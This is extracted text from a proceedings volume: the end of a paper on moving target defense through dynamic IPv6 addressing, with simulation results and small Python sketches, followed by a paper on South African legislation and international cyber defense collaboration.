space increases, the probability of correlating an address with a specific host decreases. The<br />
increased density occurs because more hosts populate the subnet. As mentioned in Section 4.3, a<br />
dense subnet results in a higher probability of an attacker detecting a host that is a false positive.<br />
Therefore, a targeted host can use the dense network to lower the probability of being detected.<br />
Density in the address space also has an inverse correlation to the possibility of address collisions. By<br />
address collision, we mean that a host changes its address to a pre-existing address on the subnet.<br />
Since each host must have a globally unique address to ensure connectivity, address collisions must<br />
be avoided on the subnet. Repeated address collisions could prevent a host from sending or receiving<br />
network traffic, thus decreasing throughput and Quality of Service (QoS). While increased density in<br />
the address space provides a host with a lower probability of detection, address space density must<br />
be balanced with the probability of address collisions to ensure network connectivity.<br />
Address size inversely correlates with the probability of address collisions. It is desirable to have a<br />
subnet populated by multiple hosts to increase the probability of an attacker finding a false positive.<br />
By increasing the address size, the address space increases. A larger address space allows for more<br />
hosts on the subnet without overpopulating the subnet. This means that a larger subnet can be less<br />
densely populated. The result is that a detected host still has the same probability of being a false<br />
positive while a host changing its address has a lower probability of an address collision.<br />
6. Simulation results<br />
To validate our analysis of changing addresses in Section 4.2, we simulated four different rates for<br />
addresses to change. The rates simulated were a static address (never changes) and addresses that<br />
changed after an attacker scanned 64 addresses (r=64), eight addresses (r=8), and one address<br />
(r=1). The simulation results are listed in Table 2. The table highlights four search intervals. The four<br />
intervals are 64, 128, 192, and 256 guesses. For each interval, a simulated attacker attempted to<br />
locate a target host with an 8-bit host address within the specified interval. Each interval was<br />
simulated for 100,000 iterations. The probability displayed is the average over the 100,000 iterations.<br />
The probabilities produced match the calculated probabilities at each interval depicted in Figure 2.<br />
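The simulation procedure can be approximated with a short Monte Carlo sketch. The scan model below (the attacker probes distinct addresses in random order; the host re-randomizes its address uniformly after every r probes) is an assumption consistent with Section 4.2, not the exact simulator used to generate Table 2.

```python
import random

def detection_probability(guesses, r=None, address_bits=8, trials=10_000):
    """Fraction of trials in which an attacker scanning distinct random
    addresses finds the target within `guesses` probes. The target
    re-randomizes its address after every r probes (None = static).
    The paper's results average over 100,000 iterations."""
    space = 2 ** address_bits
    hits = 0
    for _ in range(trials):
        target = random.randrange(space)
        for i, guess in enumerate(random.sample(range(space), guesses)):
            if r is not None and i > 0 and i % r == 0:
                target = random.randrange(space)  # host moves
            if guess == target:
                hits += 1
                break
    return hits / trials

# The static row of Table 2 approaches 0.25, 0.50, 0.75, 1:
static_row = [detection_probability(g, r=None) for g in (64, 128, 192, 256)]
```

With r=64, each 64-guess segment independently hits with probability 64/256, so detection within 256 guesses approaches 1 - 0.75**4 ≈ 0.68, matching the simulated value.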
89
Stephen Groat et al.<br />
Table 2: Probability, measured in simulation, of detecting a target host with an 8-bit address within 64,<br />
128, 192, and 256 guesses; each listed probability is the average over 100,000 iterations<br />
<br />
                          Probability of detection within:<br />
                          64 guesses   128 guesses   192 guesses   256 guesses<br />
Static Address            0.249        0.503         0.748         1<br />
Changing Address (r=64)   0.248        0.435         0.578         0.682<br />
Changing Address (r=8)    0.225        0.398         0.533         0.637<br />
Changing Address (r=1)    0.222        0.393         0.528         0.632<br />
<br />
7. Security through dynamic addressing<br />
Establishing a moving target defense is an effective way of protecting users’ privacy and data.<br />
Changing hosts’ addresses, referred to as dynamic addressing, enhances security. If target<br />
addresses continually change, an attacker loses the expectation of narrowing the search space with<br />
successive guesses. If the attacker is able to locate a targeted host, a dynamically changing host<br />
address limits the time an attacker has access to the host. Since the discovered address changes, the<br />
attacker no longer knows the host’s location on the network. Additionally, the nature of dynamic<br />
addressing prevents other types of targeted attacks, which rely on static addressing.<br />
Changing the addresses of hosts allows them to logically move within the address space or subnet.<br />
As illustrated in Figure 2, the more often an address changes, the more difficult it is to locate and<br />
target the host. A changing address, combined with other factors such as address size and subnet<br />
density, creates a moving target defense. A large address space supporting many hosts is sparsely<br />
populated, making it difficult for an attacker to pinpoint a specific target host. Other network hosts<br />
result in false positives for an attacker, while unoccupied address space reduces the possibility of<br />
address collisions. The incorporation of dynamic addressing considerably reduces the probability of<br />
detecting a target host while still maintaining connectivity.<br />
Dynamic addressing also protects against certain classes of network attacks. For example, an<br />
attacker attempting a targeted DoS attack first has to find the target host on the subnet. Even if the<br />
attacker finds the host, the attack is limited by the interval between address changes. Other targeted<br />
network attacks, such as session hijacking and man-in-the-middle, are constrained by the same<br />
limitations as DoS attacks. To attack dynamically addressed hosts, an attacker must be able to either<br />
quickly find the host after an address change or predict the address change. If a sufficiently<br />
randomized dynamic address obscuration algorithm is utilized, targeting hosts in a large address<br />
space should not be possible.<br />
Providing security at the network layer also provides transitive security against attacks and exploits at<br />
layers above the network layer since many other attacks rely on network transmissions. The majority<br />
of application layer security flaws are exploited by either taking control of a system or transferring<br />
sensitive information back to an attacker. By securing the network layer, even if an attacker is able to<br />
identify a valid vector of attack on an application, the window for attack is limited by the frequency of<br />
the address change. Once the address changes, the attacker loses any existing vector to control the<br />
remote host. The attacker must then locate the host to reestablish the connection.<br />
8. Future work<br />
The next phase of our research aims to develop a sufficiently randomized algorithm for dynamically<br />
obscuring IP addresses. Our goal is to produce an approach that dynamically changes IP addresses<br />
multiple times within a single session. By changing addresses multiple times within a single session,<br />
an attacker will have more difficulty locating target hosts. Even if an attacker locates the host,<br />
changing addresses multiple times within a session prevents the attacker from capturing enough<br />
network traffic to correlate the nature of a communication between two hosts.<br />
Our particular approach leverages IPv6. As alluded to in Section 4.1, current methods for locating a<br />
target address in an IPv6 subnet are infeasible in a reasonable amount of time. The immense IPv6<br />
address space will also likely be sparsely populated. As discussed in Section 4.3, locating any host in<br />
a sparsely populated address space is probabilistically difficult. In addition to the difficulty of locating<br />
hosts in a sparsely populated subnet, hosts using a dynamic addressing scheme can reasonably<br />
expect not to collide with occupied addresses when rotating their addresses. In order to achieve a<br />
reasonable dynamic addressing algorithm in IPv4, hosts would have to draw from a pool of unused<br />
addresses. Reserving pools of addresses is more difficult with the depletion of the IPv4 address<br />
space (NRO 2010). Additionally, an IPv4 pool of addresses, regardless of how large, would be almost<br />
trivial for an attacker to scan. To achieve a sufficiently randomized dynamic addressing algorithm, we<br />
plan to repeatedly use a cryptographic hash function to obscure the 64-bit interface identifier that<br />
makes up the host portion of an IPv6 address. By using a cryptographic hash function, malicious<br />
hosts cannot feasibly predict the dynamic address (Schneier 1996). Since hosts in IPv6 can generate<br />
and advertise their own addresses (Thomson, Narten & Jinmei 2007), obscuration is kept local.<br />
Localizing obscuration reduces the possibility of a malicious host performing any type of address<br />
hijacking or man-in-the-middle attack. It also reduces the computational overhead that address<br />
generation servers would incur.<br />
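As a sketch of the direction we intend to pursue, the fragment below derives a fresh 64-bit interface identifier per rotation interval by hashing a secret together with an interval counter. The shared secret, the counter scheme, and the choice of SHA-256 are illustrative assumptions, not the finalized obscuration algorithm.

```python
import hashlib
import ipaddress

def dynamic_address(prefix, secret, interval):
    """Hypothetical sketch: derive a 64-bit interface identifier for the
    given rotation interval by hashing secret || interval, then append
    it to the /64 network prefix."""
    digest = hashlib.sha256(secret + interval.to_bytes(8, "big")).digest()
    iid = int.from_bytes(digest[:8], "big")  # fills the low 64 bits
    net = ipaddress.IPv6Network(prefix)
    return ipaddress.IPv6Address(int(net.network_address) | iid)

a0 = dynamic_address("2001:db8::/64", b"shared-secret", 0)
a1 = dynamic_address("2001:db8::/64", b"shared-secret", 1)
# Without the secret, a1 is computationally unpredictable from a0, yet
# both addresses stay inside the same /64 subnet.
```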
9. Conclusion<br />
As users exchange more personally identifiable information over the Internet, it is increasingly<br />
important to protect users’ security and privacy. One of the best ways to accomplish this is through<br />
the use of a moving target defense. At the network layer, this can be achieved by dynamically<br />
changing host IP addresses. Frequently changing addresses are probabilistically more difficult to<br />
detect than static addresses. Dynamic addresses also provide an additional layer of security for hosts<br />
that are detected by an attacker. An attacker is unable to compromise hosts for a significant period of<br />
time since the hosts’ network address changes. Dynamically changing addresses provide security and<br />
privacy by creating a moving target solution implementable as low as the network layer of the protocol<br />
stack.<br />
References<br />
Bagnulo, M., & Arkko, J. October 2006. Cryptographically Generated Addresses (CGA) Extension Field Format.<br />
RFC 4581 (Proposed Standard).<br />
Dunlop, M., Groat, S., Marchany, R., & Tront, J., 23-28 January 2011. ‘IPv6: Now You See Me, Now You Don't’,<br />
Proceedings of the Tenth International <strong>Conference</strong> on Networks (ICN 2011), St. Maarten, The Netherlands<br />
Antilles.<br />
Fink, R. A., Brannigan, M. A., Evans, S. A., Almeida, A. M., & Ferguson, S. A. 9 May 2006. Method and<br />
Apparatus for Providing Adaptive Self-Synchronized Dynamic Address Translation, United States Patent<br />
No. US 7,043,633 B1.<br />
GLORIAD. 2010. GLORIAD Average Round Trip Time - Last Week. [Online] Available<br />
http://www.gloriad.org/gloriad/monitor/stats/avg_round_trip_time.week.html. [11 October, 2010].<br />
Johnson, P. C., Kapadia, A., Tsang, P. P., & Smith, S. W. 2007. ‘Nymble: Anonymous IP-Address Blocking’,<br />
Privacy Enhancing Technologies Symposium (PET '07), Ottawa, Canada, pp.113-133.<br />
Koukis, D., Antonatos, S., & Anagnostakis, K. 2006. On the Privacy Risks of Publishing Anonymized IP Network<br />
Traces. Communications and Multimedia Security, 4237: 22-32.<br />
Narten T., Draves, R., & Krishnan, S. September 2007. Privacy Extensions for Stateless Address<br />
Autoconfiguration in IPv6. RFC 4941 (Draft Standard).<br />
NRO. 2010. Remaining IPv4 address space drops below 5%. [Online] Available http://www.nro.net/<br />
media/remaining-ipv4-address-below-5.html, [7 November, 2010].<br />
Reiter, M., & Rubin, A. 1999. ‘Anonymous Web Transactions with Crowds’, Communications of the ACM, vol. 42,<br />
no. 2, pp. 32-48.<br />
Schneier, B. 1996. Applied Cryptography: Protocols, Algorithms, and Source Code in C, 2nd Edition. New York:<br />
Wiley.<br />
Sheymov, V. I. 18 February, 2010. Method and Communications and Communication Network Intrusion<br />
Protection Methods and Intrusion Attempt Detection System, United States Patent No. US 2010/0042513<br />
A1.<br />
Shields, C., & Levine, B. N. 2000. ‘A protocol for anonymous communication over the Internet’, Proceedings of<br />
the 7th ACM conference on Computer and communications security, Athens, Greece, pp. 33-42.<br />
Thomson, S., Narten T., & Jinmei, T. September 2007. IPv6 Stateless Address Autoconfiguration. RFC 4862<br />
(Draft Standard).<br />
Changing the Face of Cyber Warfare with International<br />
Cyber Defense Collaboration<br />
Marthie Grobler¹, Joey Jansen van Vuuren¹ and Jannie Zaaiman²<br />
¹Council for Scientific and Industrial Research, Pretoria, South Africa<br />
²University of Venda, South Africa<br />
mgrobler1@csir.co.za<br />
jjvvuuren@csir.co.za<br />
jannie.zaaiman@univen.ac.za<br />
Abstract: The international scope of the internet and global reach of technological usage requires the South<br />
African legislative system to address issues related to the application and implementation of international<br />
legislation. However, legislation in cyberspace is rather complex since the technological revolution and dynamic<br />
technological innovations are often not well suited to any legal system. A further complication is the lack of<br />
comprehensive international cyber defense cooperation treaties. The result is that many countries are not<br />
properly prepared, nor adequately protected by legislation, in the event of a cyber attack on a national level. This<br />
article will address the international cyber defense collaboration problem by looking at the impact of technological<br />
revolution on warfare. Thereafter, the article will evaluate the South African legal system with regard to<br />
international cyber defense collaboration. It will also look at the influence of cyber defense on the international<br />
position of the Government, as well as cyber security and cyber warfare acts and the command and control<br />
aspects thereof. The research presented is largely theoretical in nature, focusing on recent events in the public<br />
international domain.<br />
Keywords: collaboration, cyber defense, legislation, government responsibility<br />
1. Introduction<br />
The international scope of the internet and global reach of technological usage requires the South<br />
African legislative system to address issues related to the application and implementation of<br />
international legislation. However, the complexities of cyberspace and the dynamic nature of<br />
technology innovations requires a cyber defense framework that is not well suited to any current legal<br />
system. A further complication is the lack of comprehensive international cyber defense cooperation<br />
treaties, resulting in many countries not being properly prepared, or adequately protected by<br />
legislation, in the event of a cyber attack on a national level.<br />
For the purpose of this article, cyber warfare is defined as the use of exploits in cyber space as a way<br />
to intentionally cause harm to people, assets or economies (Owen 2008). It can further be defined as<br />
the use and management of information in pursuit of a competitive advantage over an opponent,<br />
involving "the collection of tactical information, assurance that one’s own information is valid,<br />
spreading of propaganda or disinformation among the enemy, undermining the quality of opposing<br />
force information and denial of service or of information collection opportunities to opposing forces"<br />
(Williams & Arreymbi 2007).<br />
The article will address some of the aspects related to changing the face of cyber warfare, focusing<br />
specifically on international cyber defense collaboration. It will look at some international technological<br />
revolutions that had an impact on the international legal scope and briefly evaluate the South African<br />
legal system with regard to international cyber defense collaboration. The article will also address<br />
international cyber warfare and the influence of cyber defense on the international position of the<br />
Government. The article will conclude with recommendations on working towards international cyber<br />
defense collaboration.<br />
2. Technological revolutions' impact on warfare<br />
Modern society has created both a direct and an indirect dependence on information technology, with a<br />
strong reliance on immediacy, access and connections (Williams & Arreymbi 2007). As a result, a<br />
compromise of the confidentiality, availability or integrity of the technological systems could have<br />
dramatic consequences regardless of whether it is the temporary interruption of connectivity, or a<br />
longer-term disruption caused by a cyber attack (Warren 2008).<br />
Battlespace, as implied by military use and warfare, is becoming increasingly difficult to define since<br />
advances in technology revolutionized the act of war. "Today, cyber attacks can target political<br />
92
Marthie Grobler et al.<br />
leadership, military systems, and average citizens anywhere in the world, during peacetime or war,<br />
with the added benefit of attacker anonymity. The nature of a national security threat has not<br />
changed, but the Internet has provided a new delivery mechanism that can increase the speed,<br />
diffusion, and power of an attack." (Geers ND). Although the physical destruction of the internet<br />
infrastructure as a result of cyber warfare is unlikely, a number of technological exploits can be<br />
employed as part of a cyber warfare attack aimed at financial loss. These exploits include:<br />
Probes - an attempt to gain access to a system;<br />
Scans - many probes done using an automated tool;<br />
Account compromise - hacking, or the unauthorized use of a computer account;<br />
Root compromise - compromise of an account with system administration privileges;<br />
Packet sniffing - capturing data from information as it travels over a network;<br />
Denial of service (DoS) attacks - deliberate consumption of system resources to deny service; and<br />
Malicious programs and malware - hidden programs that cause unexpected, undesired results<br />
on a system (Owen 2008).<br />
Technological revolutions in computers and electronics make major advances in weapons and<br />
warfare possible. It also extends to areas such as information processing and networks,<br />
communications, robotics and advanced munitions (O'Hanlon 2000). Technological revolutions enable<br />
countries to prepare offensive and defensive strategies in cyber space.<br />
3. Evaluating the South African legal system with regard to international cyber<br />
defense collaboration<br />
From recent activity, it is clear that the South African Government, the defense environment and<br />
the business environment are becoming increasingly aware of the threats and implications enabled by<br />
the use of the cyber environment. It is also clear that the threats are becoming more sophisticated<br />
and advanced when used as an element of cyber warfare and cyber crime.<br />
The internet is increasingly becoming more volatile and insecure. In fact, cyber terrorists have the<br />
capability to shut down South Africa’s power, disrupt financial transactions, and commit crimes to<br />
finance their physical operations. Organized crime is also increasingly making use of the internet as a<br />
means of communication and financial gain. Therefore, South Africa needs a national cyber defense<br />
system with which everybody must comply.<br />
3.1 The South African legal system<br />
Over the past decade, South Africa has taken the first steps to protect its information. It has passed<br />
legislation starting with the South African Constitution of 1996, which protects privacy, and the ECT<br />
(Electronic Communications and Transactions) Act of 2002, which provides for the facilitation and<br />
regulation of electronic communications and transactions (ECT 2002).<br />
In 2000, the PAIA (Promotion of Access to Information Act) No 2 as amended, was passed to give<br />
effect to Section 32 of the Constitution, subject to justifiable limitations (PAIA Act 2000). These<br />
limitations are aimed at the reasonable protection of privacy, commercial confidentiality and good<br />
governance in a manner that balances the right of access to information with any other rights,<br />
including the rights in the Bill of Rights in Chapter 2 of the Constitution (SA Constitution 1996). Linked<br />
to this Act is PAIA Regulation 187, the regulations regarding the promotion of access to<br />
information (Government Gazette 2003).<br />
In 2002, the RIC (Regulation of Interception of Communications and Provision of Communication-related<br />
Information) Act was passed to regulate the interception of certain communications, the<br />
monitoring of certain signals and radio frequency spectrums and the provision of certain<br />
communication-related information. This Act also regulates the making of applications for, and the<br />
issuing of, directions authorizing the interception of communications and the provision of<br />
communication-related information under certain circumstances (RIC Act 2002).<br />
Towards the end of 2009, the South African Government passed two bills, namely the:<br />
PPI (Protection of Personal Information) Bill that introduces brand new legislation to ensure that<br />
the personal information of individuals is protected, regardless of whether it is processed by public<br />
or private bodies (Giles 2010).<br />
Information Bill that is meant to replace an existing piece of legislation, the Protection of<br />
Information Act of 1982. It deals with the protection of State information and empowers the<br />
government to classify certain information in order to protect the national interest from suspected<br />
espionage and other hostile activities (Republic of South Africa 2010).<br />
Playing an important role in the South African legal system are international standards. ISO/IEC 27002<br />
is an information security standard published by the International Organization for Standardization<br />
(ISO) and the International Electrotechnical Commission (IEC), originally published as ISO/IEC<br />
17799:2005. It is entitled Information technology - Security techniques - Code of practice for<br />
information security management. This standard has been accepted by and adopted in South Africa<br />
(International Standards Organization 2008).<br />
South Africa also signed the Council of Europe Cyber Crime Treaty in Budapest in 2001 but has<br />
not yet ratified it. The treaty contains important provisions to assist law enforcement in their fight<br />
against transborder cyber crime. Therefore, it is imperative that South Africa ratifies the cyber crime<br />
treaty to avoid becoming an easy target for international cyber crime. The ratification will hopefully be<br />
done soon, although the South African government seems to be presently focused on basic service<br />
delivery and more traditional crimes given the current local crime situation. However, steps to<br />
establish the Computer Security Incident Response Team (CSIRT) indicate that the aim to tackle<br />
cybercrime is gathering momentum.<br />
3.2 The South African position on international cyber defense collaboration<br />
In February 2010, South Africa published a draft Cyber security policy that would set a framework for<br />
the creation of relevant structures, boost international cooperation, build national capacity and<br />
promote compliance with appropriate cyber crime standards. Over the last five years, South Africa<br />
focused on modernizing and expanding information technology equipment, applications, and<br />
centralized hosting capabilities and network infrastructure. This was done as part of its strategy to<br />
fully modernize and integrate the national criminal justice system to the maximum benefit of society<br />
and at minimum cost to crime prevention agencies. This policy has not been adopted, but provides a<br />
first step from South Africa towards international cyber defense collaboration.<br />
In a more recent move towards international cyber defense collaboration, South Africa participated in<br />
the 12 th United Nations Congress on Crime Prevention and Criminal Justice in Salvador, Brazil during<br />
April 2010. During this congress, delegates considered the best possible responses to cyber crime as<br />
the Congress Committee took up the dark side of advances in Information Technology. While<br />
advances in information technology held many benefits for society, its dark underside (computer-based<br />
fraud and forgery, illegal interception of private communications, interference with data and<br />
misuse of electronic devices) requires States to develop an organized, international response.<br />
Speakers at the congress remained undecided about the nature of the required response, with<br />
supporters of the Council of Europe’s Budapest Convention on crime suggesting an expansion of the<br />
treaty, and others suggesting new multilateral negotiations (UN Information Officer 2010).<br />
In general, governments are having a tough time keeping pace, and their responses to cyber crime are<br />
sadly lacking. In many countries, cyber crime damages economies and State credibility and further<br />
impedes national development. Cooperation in stamping out cyber crime and protecting countries against<br />
cyber warfare is vital at all levels of defense, law enforcement, the judiciary and the private sector.<br />
According to Markoff (2010), a group of cyber security specialists and diplomats, representing 15<br />
countries (including South Africa) has agreed on a set of recommendations to the United Nations'<br />
Secretary General for negotiations on an international computer security treaty. In recent years, an<br />
explosion in cyber crime has been accompanied by an arms race in cyber weapons, as dozens of<br />
nations have begun to view computer networks as arenas for espionage and warfare. The<br />
recommendations to the United Nations from the specialists and diplomats reflect an effort to find<br />
ways to address the dangers of the anonymous nature of the Internet, such as when the target of a<br />
cyber attack misidentifies the attacker. Among the troubling issues is the existence of<br />
proxies. The report also suggests that “the same laws that apply to the use of kinetic weapons should<br />
apply to state behavior in cyber space.” (Markoff 2010). The report recommends five steps to improve<br />
international cyber cooperation and security:<br />
Having more discussions about the ways different nations view and protect their computer<br />
networks, including the Internet;<br />
Discussing the use of computer and communications technologies during warfare;<br />
Sharing national approaches on legislation about computer security;<br />
Finding ways to improve the Internet capacity of less developed countries; and<br />
Negotiating to establish common terminology to improve the communications about computer<br />
networks (Markoff 2010).<br />
The signers of the report include major cyber powers and other nations: the United States, Belarus,<br />
Brazil, Britain, China, Estonia, France, Germany, India, Israel, Italy, Qatar, Russia, South Africa and<br />
South Korea. From a legal perspective, a number of concerns can be identified, such as:<br />
Lack of collaboration between industry and the defense environment;<br />
Capacity of the legal fraternity to comprehend the complexity of the cyber environment and to<br />
deliver a verdict based on a thorough understanding of the facts;<br />
Collaboration between countries and the agreements on protocols;<br />
Lack of collaboration between State Departments on cyber warfare and cyber crime;<br />
Lack of collaboration between municipalities, districts, regions and provinces; and<br />
Lack of collaboration between urban and tribal authorities.<br />
Networked computers now control everything, including bank accounts, stock exchanges, power<br />
grids, defense, the justice system and government. Networked computers also control all health<br />
records and crucial personal data. From a single computer an entire nation can be brought down. The<br />
authors are of the opinion that a series of regional conferences with all stakeholders involved and<br />
sponsored by the private sector should be conducted. Significant progress has been made in South<br />
Africa, but commitments are required to draft a comprehensive Charter for South Africa and its unique<br />
situation.<br />
4. International cyber warfare<br />
The North Atlantic Treaty Organization (NATO) is only just beginning to recognize that the Internet<br />
has become a new battleground that also requires a military strategy. To counter such threats, a<br />
group of NATO members established a cyber defense centre in Tallinn. The 30 staffers at the<br />
Cooperative Cyber Defense Centre of Excellence analyze emerging viruses and other threats and<br />
pass on alerts to sponsoring NATO governments. Experts on military, technology, law and science<br />
are wrestling with such questions as: what qualifies as a cyber attack on a NATO member, and so<br />
triggers the obligation of alliance members to rush to its defense; how can the alliance defend itself in<br />
cyber space? Answers to these questions are strikingly different: Washington creates new funds for<br />
cyber defenses; Estonia is aiming to create a nation of citizens alert and wise to online threats (NATO<br />
ND).<br />
The choice of Estonia as the home to NATO’s new cyber war brain trust is not accidental. In 2007,<br />
Estonia suddenly found itself in the midst of cyber attacks. The fact that this happened in Estonia, a<br />
proud digital society, was eye opening. Back in 2007, Estonia’s minister of defense stated that the<br />
attacks cannot be treated as hooliganism, but as an attack against the State. Nevertheless, no troops<br />
crossed Estonia’s borders, and there was nothing that could be regarded as a conventional conflict.<br />
The United States clearly wants to take a military strategy approach. Estonia, on the other hand,<br />
prefers to demilitarize the issue by educating citizens on how to identify risks and promote a culture of<br />
cyber security, starting with schoolchildren. The Estonians have the right idea. A society of savvy<br />
citizens is the best defense (Geers ND).<br />
In response to the cyber attacks on Estonia in 2007 and on Georgia in 2008, NATO set up a coordinated cyber<br />
defense policy with a quick-reaction cyber team on permanent standby. This, however, has not<br />
stopped the constant attack on NATO computers (Gardner 2009).<br />
5. Influence of cyber defense on the international position of Governments<br />
The opinion of international Department of Defense (DOD) officials is that cyber space is a domain<br />
available for warfare, similar to air, space, land, and sea (Wilson 2007). As a result, any cyber attacks<br />
can have either a direct or an indirect influence on the DOD. Accordingly, the DOD needs to consider<br />
the potential effects of an emerging military-technological revolution that will have profound effects on<br />
the way wars are fought. Growing evidence exists that over the next several decades, the military<br />
systems and operations will be superseded by new, far more capable means and methods of warfare<br />
by new or greatly modified military organizations (Krepinevich 2003).<br />
The DOD views information itself as both a weapon and a target in warfare. In addition, information provides the<br />
ability to disseminate persuasive information rapidly in order to directly influence the decision making<br />
of diverse audiences. By incorporating the cyber domain into the cyber defense structure, a number of<br />
new aspects come into play that may influence the manner in which the DOD reacts to<br />
cyber attacks:<br />
 New national security policy issues;<br />
 Consideration of psychological operations used to affect friendly nations or domestic audiences;<br />
and<br />
 Possible accusations against the State of war crimes if offensive military computer operations or<br />
electronic warfare tools severely disrupt critical civilian computer systems, or the systems of non-combatant<br />
nations (Wilson 2007).<br />
As an example of the last point: if wrongful acts are committed inside a country, the State can be<br />
held responsible for those acts, since the State is obliged to uphold the interests of the entire<br />
international community. If a representative of a State organ, or a private person acting on the State's<br />
behalf, committed an act, the act may be attributed to the State (Article 3 ILC Draft Articles). The<br />
physical location of a computer or hardware used in a cyber attack does not (and should not) allow for<br />
attributing that cyber attack to a particular State. Such an assumption would be greatly unjustified,<br />
since a State does not carry responsibility for the actions of its residents operating hardware located<br />
within its territory.<br />
The State can, however, be held responsible in the light of existing international law doctrine for a<br />
breach of an international obligation. This obligation relates not to actions but to omissions, i.e. to the<br />
failure to prevent the attack from taking place. This interpretation is derived from the wording of Article 14(3) of<br />
the International Law Commission (ILC) Draft Articles, which provides that a State may be held<br />
responsible for the conduct of organs of an insurrectional movement, if such an attribution is<br />
legitimate under international law. The State therefore has an obligation to show best efforts, and to<br />
take all “reasonable and necessary” measures to prevent a given incident from happening. The<br />
occurrence of this obligation was best reflected in the International Court of Justice (ICJ) case<br />
concerning the United States diplomatic and consular staff in Teheran. In its decision, the ICJ found<br />
that the overrunning of the United States embassy in Teheran did not free Iran from responsibility<br />
for that incident, even though the incident itself could not be attributed to Iran (Kulesza 2010).<br />
The State is also responsible for providing sufficient international protection from cyber attacks<br />
conducted by its residents from its territory. It is the duty of any State from whose territory an<br />
internationally wrongful act is conducted to cooperate with the victim State and to prevent future<br />
similar harmful deeds. If the State itself is not capable of protecting the interests of another sovereign,<br />
it also may not allow private persons acting from within its territory to inflict damage on, or create<br />
danger to, the other State while they are protected by its immunity. Under such an interpretation,<br />
Russia’s refusal to prosecute the perpetrators of the attack against Estonia would constitute an<br />
internationally wrongful act, while Israel's prosecution and punishment of the actors behind the Solar<br />
Sunrise attack on United States Air Force databases, carried out via a Texas internet provider, exonerates<br />
it from any international responsibility (Kulesza 2010).<br />
In this light, it is therefore the obligation of the South African government to launch and support<br />
awareness projects to prevent these attacks from inside its borders. This also includes the<br />
establishment of a CSIRT, as proposed in the draft South African Cyber security policy. Currently,<br />
South Africa is one of only a handful of countries that does not have a running CSIRT, putting South<br />
Africa in a disadvantaged position with regard to cyber attack and defense (FIRST 2009).<br />
6. Working towards international cyber defense collaboration<br />
Cyber warfare is an emerging form of warfare not explicitly addressed by existing international law.<br />
While most agree that legal restrictions should apply to cyber warfare, the international community<br />
has yet to reach consensus on how international humanitarian law (IHL) applies to this new form of<br />
conflict (Kelsey 2008). In particular, there is a need for an international consensus on the due<br />
diligence criteria which have to be fulfilled by a State in order to avoid international responsibility for<br />
failing to protect other sovereigns from cyber attacks conducted from its territory.<br />
Another crucial issue is to establish the standards for releasing a State from any international<br />
responsibility for not providing due diligence: would the adoption of specific provisions in national<br />
criminal laws be sufficient, or would State authorities need to effectively initiate a criminal<br />
investigation? It should also be clarified whether a due diligence standard can be set post factum – after<br />
an attack has already taken place (Kulesza 2010). In South Africa, this is not possible.<br />
A suggested approach to creating Nation State responsibility in building a credible cyber system<br />
involves the following steps:<br />
 Developing a national strategy and making sure all agencies and major stakeholders follow it;<br />
 Establishing a national endorsement body for cyber security;<br />
 Establishing a national coordination mechanism;<br />
 Including all professional communities, the private sector, and others in the national cyber security<br />
effort; and<br />
 Providing the necessary resources and institutional changes (Tiirmaa-Klaar 2010).<br />
If States worldwide each implement their own credible cyber system, cooperation at an<br />
international cyber defense level will be easier to realize. As an initial attempt to enable a more<br />
uniform cyber defense system, the European Commission is planning to impose harsher penalties for<br />
cyber crimes. Large-scale attacks in Estonia and Lithuania in recent years have highlighted the need<br />
for a stronger stance on cyber crime. Estonia, Lithuania, France and the United Kingdom already have<br />
longer sentences for such crimes, and the European Commission is looking to harmonize practice<br />
across the member states. United States president Barack Obama has declared cyber crime to be a<br />
priority. In addition to stronger laws, the European Union is looking to set up a system through which<br />
member states can contact one another quickly to give notice of attacks. That would help to<br />
build a picture of the scope of cyber crime (Geers ND).<br />
7. Conclusion<br />
The Internet has changed almost all aspects of human life, including the nature of warfare. Every<br />
political and military conflict now has a cyber dimension, whose size and impact are difficult to predict.<br />
"The ubiquitous nature and amplifying power of the Internet mean that future victories in cyber space<br />
could translate into victories on the ground. National critical infrastructures, as they are increasingly<br />
connected to the Internet, will be natural targets during times of war. Therefore, nation-states will<br />
likely feel compelled to invest in cyber warfare as a means of defending their homeland and as a way<br />
to project national power" (Geers ND).<br />
The international scope of the internet and the wide reach of technological usage have a tremendous<br />
impact on the nature of war and crime globally. This article has shown the impact of technological<br />
revolutions on warfare, the South African legislation affecting warfare and cyber war, and the<br />
need for international cyber defense collaboration.<br />
References<br />
ECT Act (Electronic Communications and Transactions Act No 25 of 2002). (2002). Available from:<br />
http://www.acts.co.za/ect_act/ (Accessed 10 October 2010).<br />
FIRST. (2009). FIRST: Teams around the world. Available from: http://www.first.org/members/map/ (Accessed 14<br />
October 2010).<br />
Gardner, F. (2009). Nato's cyber defence warriors. BBC News. Available from: http://news.bbc.co.uk/2/hi/europe/7851292.stm<br />
(Accessed 22 September 2010).<br />
Geers, K. (ND). Cyber Defence. Available from: http://www.vm.ee/?q=en/taxonomy/term/214 (Accessed 22<br />
September 2010).<br />
97
Marthie Grobler et al.<br />
Giles, J. (2010). How will the PPI Bill affect you? Available from: http://www.michalsonsattorneys.com/how-will-the-ppi-bill-affect-you/2586<br />
(Accessed 10 October 2010).<br />
Government Gazette. (2003). Vol. 451 Cape Town 15 January 2003 No. 24250. No. 54 of 2002: Promotion of<br />
Access to Information Amendment Act, 2002.<br />
International Organization for Standardization. (2008). ISO/IEC 27005:2008. Information security risk management.<br />
Available from: http://www.iso.org/iso/catalogue_detail?csnumber=50297 (Accessed 10 October 2010).<br />
Kelsey, JTG. (2008). Hacking into International Humanitarian Law: The Principles of Distinction and Neutrality in<br />
the Age of Cyber Warfare. p. 1427. Available from: http://heinonline.org/HOL/LandingPage?collection=journals&handle=hein.journals/mlr106&div=64<br />
(Accessed 22 September 2010).<br />
Krepinevich, AF. (2003). Keeping pace with the military-technological revolution. Available from:<br />
http://www.issues.org/19.4/updated/krepinevich.pdf (Accessed 22 September 2010).<br />
Kulesza, J. (2010). State responsibility for acts of cyber-terrorism. 5th GigaNet Symposium, Vilnius, Lithuania.<br />
Markoff, J. (2010). Step Taken to End Impasse Over Cybersecurity Talks. Available from: http://www.nytimes.com/2010/07/17/world/17cyber.html?_r=1<br />
(Accessed 8 October 2010).<br />
NATO. (ND). Defending against cyber attacks. Available from: http://www.nato.int/cps/en/natolive/topics_49193.htm<br />
(Accessed 22 September 2010).<br />
O'Hanlon, ME. (2000). Technological change and the future of warfare. Brookings Institution Press: Washington.<br />
Owen, RS. (2008). Infrastructures of Cyber Warfare. Chapter V. In: Janczewski, L. & Colarik, AM. Cyber warfare<br />
and cyber terrorism. Information Science Reference: London.<br />
